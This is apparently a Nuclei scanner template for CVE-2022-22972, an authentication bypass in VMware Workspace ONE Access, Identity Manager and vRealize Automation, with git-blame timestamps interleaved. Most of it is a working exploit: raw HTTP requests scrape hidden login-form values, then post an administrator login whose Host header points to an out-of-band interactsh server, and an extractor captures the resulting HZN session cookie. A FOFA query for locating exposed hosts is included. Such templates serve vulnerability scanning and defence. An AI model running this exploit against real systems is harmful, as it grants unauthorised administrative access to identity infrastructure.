2022-05-30 23:02:11 +00:00
id : CVE-2022-22972
info :
2022-06-03 19:12:31 +00:00
name : VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass
2022-05-30 23:02:11 +00:00
author : For3stCo1d,princechaddha
severity : critical
description : |
VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
reference :
- https://github.com/horizon3ai/CVE-2022-22972
- https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive
- https://www.vmware.com/security/advisories/VMSA-2022-0014.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-22972
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2022-22972
cwe-id : CWE-287
2023-08-31 11:46:18 +00:00
epss-score : 0.78281
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.97824
2022-05-30 23:02:11 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 3
2022-05-30 23:02:11 +00:00
fofa-query : app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize"
2023-07-11 19:49:27 +00:00
vendor : vmware
product : identity_manager
2022-05-30 23:02:11 +00:00
tags : cve,cve2022,vmware,auth-bypass,oast
2023-04-27 04:28:59 +00:00
http :
2022-05-30 23:02:11 +00:00
- raw :
- |
GET /vcac/ HTTP/1.1
Host : {{Hostname}}
- |
GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1
Host : {{Hostname}}
- |
POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1
Host : {{interactsh-url}}
Content-type : application/x-www-form-urlencoded
protected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in
2023-07-11 19:49:27 +00:00
cookie-reuse : true
2022-10-07 21:27:25 +00:00
host-redirects : true
2022-05-30 23:02:11 +00:00
max-redirects : 3
2023-07-11 19:49:27 +00:00
matchers-condition : and
matchers :
- type : word
part : header
words :
- "HZN="
- type : word
part : interactsh_protocol
words :
- "http"
- type : status
status :
- 302
2022-05-30 23:02:11 +00:00
extractors :
- type : regex
name : protected_state
group : 1
regex :
- 'id="protected_state" value="([a-zA-Z0-9]+)"\/>'
internal : true
2023-07-11 19:49:27 +00:00
part : body
2022-05-30 23:02:11 +00:00
- type : regex
name : horizonRelayState
group : 1
regex :
- 'name="horizonRelayState" value="([a-z0-9-]+)"\/>'
internal : true
2023-07-11 19:49:27 +00:00
part : body
2022-05-30 23:02:11 +00:00
- type : regex
name : userstore
group : 1
regex :
- 'id="userstore" value="([a-z.]+)" \/>'
internal : true
2023-07-11 19:49:27 +00:00
part : body
2022-05-30 23:02:11 +00:00
- type : regex
name : userstoreDisplay
group : 1
regex :
- 'id="userstoreDisplay" readonly class="login-input transparent_class" value="(.*)"/>'
internal : true
2023-07-11 19:49:27 +00:00
part : body
2022-05-30 23:02:11 +00:00
- type : regex
name : stickyConnectorId
group : 1
regex :
- 'name="stickyConnectorId" value="(.*)"/>'
internal : true
2023-07-11 19:49:27 +00:00
part : body
2022-05-30 23:02:11 +00:00
- type : kval
name : HZN-Cookie
kval :
- 'HZN'
part : header